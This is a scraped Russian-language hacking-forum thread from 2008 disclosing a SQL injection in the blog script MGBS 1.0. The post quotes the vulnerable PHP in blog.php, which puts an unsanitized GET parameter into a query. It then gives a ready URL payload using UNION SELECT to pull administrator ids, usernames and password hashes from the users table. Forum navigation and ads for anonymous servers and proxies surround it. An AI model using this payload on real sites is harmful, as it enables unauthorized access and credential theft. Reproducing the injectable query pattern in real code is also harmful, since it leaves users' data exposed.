АНОНИМНЫЕ ВЫДЕЛЕННЫЕ СЕРВЕРА И VPS ПОД ЛЮБЫЕ ЗАДАЧИ И ЦЕЛИ
Proxies from $0.15 to $3 | 100K+ IPs | IPv4, SOCKS5 & HTTP | Residential & Mobile | 24/7 Support | API Available

ОПЕРЕДИ ГРИНЧА: ЗАЛУТАЙ МАКСИМУМ ПОДАРКОВ С ХОСТИНГОМ aéza

Search titles only

Posted by Member:

Separate names with a comma.

Newer Than:

Search this thread only

Search this forum only

Display results as threads

More...

Useful Searches

Recent Posts

MGBS 1.0 Remote SQL injection

Discussion in 'Веб-уязвимости' started by The_HuliGun, 21 Jan 2008.

The_HuliGun Elder - Старейшина

Joined:

19 May 2007

Messages:

191

Likes Received:

84

Reputations:

11
Скрипт блога MGBS содержит багу типа sql injection. Уязвим сценарий blog.php:

PHP:

<?php $month = $_GET['month']; $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN"); ...

md5 хеш админа

Code:

http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*

Бага найдена мной вчера и опубликована на милворме
#1 The_HuliGun, 21 Jan 2008

4 people like this.

(You must log in or sign up to post here.)